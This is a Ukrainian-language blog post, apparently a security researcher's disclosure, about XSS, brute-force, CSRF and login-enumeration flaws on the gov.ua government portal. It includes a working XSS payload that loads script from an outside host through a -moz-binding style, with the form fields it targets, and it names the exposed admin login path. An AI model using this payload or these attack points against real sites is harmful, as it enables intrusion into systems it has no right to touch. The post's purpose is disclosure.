Websecurity - Веб безпека

25.07.2012

У липні, 04.07.2012, я знайшов Cross-Site Scripting, Brute Force, Cross-Site Request Forgery, Abuse of Functionality та Insufficient Anti-automation уразливості на сайті http://www.gov.ua - “головному” gov.ua домені. Про XSS мені повідомив AmplenuS, а коли я ці дірки перевірив, то знайшов іще BF, CSRF, AoF та IAA дірки. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

13.12.2012

XSS:

POST запит на сторінці http://www.gov.ua/contact.html (це приклад коду для атаки на Mozilla і Firefox < 3.0, для інших браузерів можливі інші варіанти атакуючого коду).

" style="-moz-binding:url('http://websecurity.com.ua/webtools/xss.xml#xss')"

В полях: Зворотня адреса, Ваше ПIБ, Доменне ім’я, Текст повідомлення.

Brute Force:

http://www.gov.ua/manager/

Cross-Site Request Forgery:

http://www.gov.ua/manager/

Abuse of Functionality:

В формі логіна http://www.gov.ua/manager/ можна виявляти логіни користувачів (Login enumeration).

Insufficient Anti-automation:

Із-за відсутності захисту від автоматизованих атак в формі логіна, окрім Brute Force атак також можливі автоматизовані атаки на функції логіна (для автоматизованого виявлення логінів) та відновлення паролю (для виявлення емайлів користувачів).

Якщо BF, AoF та IAA уразливості вже виправлені, шляхом обмеження доступу до папки з адмінкою (що не вирішило проблеми з CSRF), то XSS досі не виправлені.

This entry was posted on 17:20 13.12.2012 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.